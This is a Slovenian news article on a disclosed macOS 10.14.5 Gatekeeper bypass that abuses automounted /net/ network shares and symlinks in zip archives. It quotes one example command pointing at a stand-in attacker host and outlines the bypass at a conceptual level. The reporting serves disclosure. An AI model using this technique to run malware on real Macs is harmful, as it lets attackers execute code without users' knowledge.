Zlonamerno aplikacijo je enostavno namestiti na Mac. Apple napake ni odpravil niti po treh mesecih

27. 5. 2019

Varnostni raziskovalec Filippo Cavallarin je na svojem blogu objavil opozorilo o napaki v macOS 10.14.5. To je sestavljeno iz možnosti popolnega obhoda varnostnih ukrepov Gatekeeperja. Po besedah Cavallarina je Apple na napako opozoril že februarja letos, a je podjetje v zadnji posodobitvi ni odpravilo.

Gatekeeper je razvil Apple in ga leta 2012 prvič vključil v svoj namizni operacijski sistem. Gre za mehanizem, ki preprečuje zagon aplikacije brez vednosti in privolitve uporabnika. Ko prenesete aplikacijo, Gatekeeper samodejno preveri njeno kodo, da ugotovi, ali je programsko opremo pravilno podpisal Apple.

Cavallarin v svoji objavi v spletnem dnevniku navaja, da Gatekeeper privzeto obravnava zunanje pomnilnike in skupne rabe omrežja kot varne lokacije. Vsako aplikacijo, ki se nahaja v teh ciljih, je torej mogoče samodejno zagnati, ne da bi morali opraviti preverjanje Gatekeeperja. To funkcijo je mogoče izkoristiti za zagon zlonamerne programske opreme brez vednosti uporabnika.

Eden od vidikov, ki omogoča nepooblaščen dostop, je funkcija samodejnega priklopa, ki uporabnikom omogoča samodejno pripenjanje omrežne skupne rabe preprosto tako, da navedejo pot, ki se začne z "/net/". Kot primer Cavallarin navaja pot "ls /net/evil-attacker.com/sharedfolder/", ki lahko povzroči, da operacijski sistem naloži vsebino mape "sharefolder" na oddaljeni lokaciji, ki je lahko potencialno zlonamerna.

Delovanje grožnje si lahko ogledate v videu:

Drugi dejavnik je dejstvo, da Gatekeeper ne bo preveril arhiva zip, ki vsebuje določeno simbolno povezavo, ki vodi do funkcije samodejnega vpetja, če je v skupni rabi. Na ta način lahko žrtev preprosto prenese zlonamerni arhiv in ga razpakira, kar napadalcu omogoči zagon skoraj katere koli programske opreme na Macu brez vednosti uporabnika. Iskalnik, ki privzeto skrije določene razširitve, ima tudi svoj delež te ranljivosti.

Cavallarin na svojem blogu navaja, da je Apple 22. februarja letos opozoril na ranljivost operacijskega sistema macOS. Toda sredi maja je Apple prenehal komunicirati s Cavallarinom, zato se je Cavallarin odločil, da bo vse skupaj objavil.

Vir: FCVL

Teme: shranjevanje, samodejno, MacOS, video, prilagoditev, funkcijo, uporabnik, aplikace, Apple

Razprava o članku

Vase jméno

Vaš komentar

Z izpolnitvijo zgornjih podatkov potrjujem, da je podjetje TEXT FACTORY s.r.o., sedež v Brnu, Durďákova 336/29, Černá Pole, poštna številka: 613 00, ID številka: 06157831, registrirano pri deželnem sodišču v Brnu, oddelek C. , vložek 100399, bo moje osebne podatke, navedene v registracijskem obrazcu, ki sem ga izpolnil, obdeloval na podlagi zakonitih interesov TEXT FACTORY s.r.o. v skladu s črko 6. odst. f) GDPR in za izpolnjevanje zakonskih obveznosti (člen 1, odstavek 6, točka c) GDPR), za naslednje namene: potreba po zagotavljanju avtorizacije obiskovalcev spletnih mest, ki jih upravlja TEXT FACTORY s.r.o., da aktivno prispevajo k objavljenim člankom ali v razpravah. forumov in uveljavljanje pravic TEXT FACTORY s.r.o. kot skrbnika teh forumov. Več informacij o obdelavi osebnih podatkov in pravicah najdete v Lekcije o varstvu osebnih podatkov. celotno besedilo

Lahko bi bilo te zanima

Povezano